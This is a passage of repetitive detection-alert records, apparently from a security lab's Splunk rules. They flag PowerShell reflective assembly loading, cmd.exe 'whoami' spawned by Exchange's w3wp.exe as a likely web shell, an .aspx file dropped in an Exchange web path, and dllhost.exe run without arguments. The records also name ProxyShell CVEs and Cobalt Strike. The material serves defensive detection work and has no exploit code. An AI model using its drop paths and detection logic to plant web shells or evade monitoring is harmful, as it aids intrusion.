[\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T04:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T04:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664862231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="1", dest="exchange01.attackrange.local", firstTime="2022-10-04T04:12:14", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T04:12:14", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="unknown" 1664862231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="1", dest="exchange01.attackrange.local", firstTime="2022-10-04T04:12:14", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T04:12:14", original_file_name="Cmd.Exe", parent_process="c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangeECPAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm22f2d629-7f3a-4ef5-b1a4-3803dbe4db34 -h \"C:\\inetpub\\temp\\apppools\\MSExchangeECPAppPool\\MSExchangeECPAppPool.config\" -w \"\" -m 0", process="\"c:\\windows\\system32\\cmd.exe\" /c whoami", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="SYSTEM" 1664862231, search_name="ESCU - W3WP Spawning Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="Hermetic Wiper", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.cve="CVE-2021-34473", annotations.cve="CVE-2021-34523", annotations.cve="CVE-2021-31207", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", count="1", dest="exchange01.attackrange.local", firstTime="2022-10-04T04:12:14", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T04:12:14", original_file_name="unknown", parent_process="C:\\Windows\\System32\\inetsrv\\w3wp.exe", process="\"c:\\windows\\system32\\cmd.exe\" /c whoami", process_name="cmd.exe", risk_message="Possible Web Shell execution on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="This query identifies a shell, PowerShell.exe or Cmd.exe, spawning from W3WP.exe, or IIS. In addition to IIS logs, this behavior with an EDR product will capture potential webshell activity, similar to the HAFNIUM Group abusing CVEs, on publicly available Exchange mail servers. During triage, review the parent process and child process of the shell being spawned. Review the command-line arguments and any file modifications that may occur. Identify additional parallel process, child processes, that may highlight further commands executed. After triaging, work to contain the threat and patch the system that is vulnerable.", user="EXCHANGE01$" 1664856000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664856000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4108", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664856000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664856000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x100c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664860160, search_name="ESCU - Detect Exchange Web Shell - Rule", analyticstories="CISA AA22-257A", analyticstories="HAFNIUM Group", analyticstories="ProxyShell", annotations="{\"analytic_story\": [\"HAFNIUM Group\", \"ProxyShell\", \"CISA AA22-257A\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1505\", \"T1505.003\", \"T1190\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"file_name\", \"role\": [\"Victim\"], \"type\": \"File Name\"}]}", annotations.analytic_story="HAFNIUM Group", annotations.analytic_story="ProxyShell", annotations.analytic_story="CISA AA22-257A", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1505", annotations.mitre_attack="T1505.003", annotations.mitre_attack="T1190", dest="exchange01.attackrange.local", file_create_time="2022-10-04 04:05:19.428", file_name="iismetafxbji.aspx", file_path="C:\\inetpub\\wwwroot\\aspnet_client\\iismetafxbji.aspx", info_max_time="+Infinity", info_min_time="0.000", process_name="System", risk_message="A file - iismetafxbji.aspx was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint exchange01.attackrange.local by user $user$.", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="81.0", savedsearch_description="The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", threat_object="iismetafxbji.aspx", threat_object_type="file name" 1664859332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664859332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664859332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T03:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T03:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664859332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", 